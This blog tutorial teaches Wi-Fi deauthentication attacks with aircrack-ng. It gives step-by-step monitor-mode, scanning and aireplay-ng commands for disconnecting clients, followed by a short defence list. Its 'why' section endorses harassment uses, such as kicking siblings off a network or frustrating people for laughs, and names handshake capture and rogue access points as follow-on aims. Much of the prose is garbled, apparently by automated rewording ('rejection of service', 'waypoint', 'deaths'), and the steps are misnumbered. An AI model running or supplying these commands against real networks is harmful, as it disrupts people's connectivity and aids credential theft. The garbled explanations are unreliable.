In this blog, we are going to be looking at a hack attack called deauthentication. In my humble opinion, when a hacker learns about a new attack, he or she has the obligation to also learn how to prevent it. So, this is not going to be a simple how-to, this blog will be divided into 4 parts:
What is a Deauth Attack?
Why would you want to attack in that way?
How to do it?
How to prevent the attack and take the necessary precautions?
What is a Deauth Attack?
Deauthentication is a kind of rejection of service attack that targets communication between a user and a Wi-Fi point.
This gives disassociate packets to one or more customers which are currently combined with a particular access point. Of course, this is fully useless if there are no wireless consumers or fake authentications.
The cool thing about this initiative is that where all networks are using WPA2 encryption you can simply deauth anything or anyone without even being inside the network.
Why does a deauth attack work on WPA2 encryption?
The method of encryption in 802.11 is limited to information payloads only. Encryption does not refer to the 802.11 frame headers, and cannot do so as key components of 802.11 headers are required for normal operations of 802.11 traffic.
Since 802.11 control frames largely work by setting data in the headers, management frames are not encrypted and as such are regularly spoofed.
Why would a person attack a network in that way?
A deauth offence is, most of the time, a step of a more inclusive attack! Hackers are usually required to deauth a client off of a network so they can:
- Capture WPA/WPA2 4-Way Handshakes by pushing a user to reconnect to the network.
- Force users to communicate to their own Rogue point.
- Force users to communicate to a Captive Portal.
You can also deauth clients in your network for the way easy reasons, like:
- Oppose a sibling or a friend of the network just because others are slowing your relationship down.
- Frustrate people and laugh.
How to Deauth?
For this attack we need a device called aircrack-ng, aircrack-ng is more of a suite containing many tools to assess Wi-Fi network security,
Ok! one last thing, since we are speaking about giving packets we will require a wireless adapter both work in monitor mode and be a packet injector!
What is Monitor Mode?
Monitor mode enables you to take data transmitted and received by wireless accessories and networks nearby. Without it, you can not see which projects are working and what is transpiring inside the network.
What is Packet Injection?
Packet injection enables you to craft and inject or transmit data to wireless plans and networks nearby. Without it, you can not prevent or manipulate any activity from within the network.
- Step 1: Set up Kali and open up a Terminal
By typing ifconfig and the enter key on your terminal At the eth0 section in my ifconfig output, you understand that I have inet 10.0.2.15, this is because I am using Kali Linux on a Virtual Organization and I have it attached on a nat network. Don't worry about it, you do not even have to care!
All YOU have to worry about is the wlan0 section that is your broadcast adapter and as you can see mine is not even connected to a network.
- Step 2 :Setting wireless adapter in monitor mode with airmon-ng
By running the airmon-ng start wlan0 you are setting up your adapter to monitor mode!
- Step 3: Searching for Victims with airodump-ng
Run-on your terminal => airodump-ng wlan0mon
- Step 4: Specific Targeting for better information gathering
Now that we know all that we require to know about the aim we have to determine any devices connected to the network.
The commands are airodump-ng -d "target's BSSID" -c "target's channel number" "wireless adapter model name"
- Step 5 | Deauthenticating Device from the network
aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon
-0 centers deauthentication.
0 is the number of deaths to send 0 means to send them continuously, you can post 10 if you want the target to separate and reconnect.
-a 50:C7:BF:DC:4C: E8 is the MAC address of the waypoint we are targeting.
-c E0:B5:2D: EA:18:A7 is the MAC address of the customer to deauthenticate; if this is ignored then all customers are deauthenticated.
wlan0mon is the name.
Step 4 : Stop the attack and take the necessary precautions
Stop the attack and take the necessary precautions
You are now well familiar with the attack and know all the theories a beginner may need! But how could one defend against a deauthentication attack? You can not stop a guy from addressing deauth packets. Instead, you should make sure your network is configured in a form that the deauth drive doesn't allow an attacker to compromise your network.
- Make sure the network is utilizing WPA2 encryption.
- Your Wi-Fi passphrase should be quite long and strong.
- Once you have been separated from your network, make sure that you connect back to a WPA2 protected network and not an apparent one with the same name as yours!
If you have any doubt about the deauthentication don’t hesitate to contact us through the given email. Airzero sec will be your digital solution.
Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/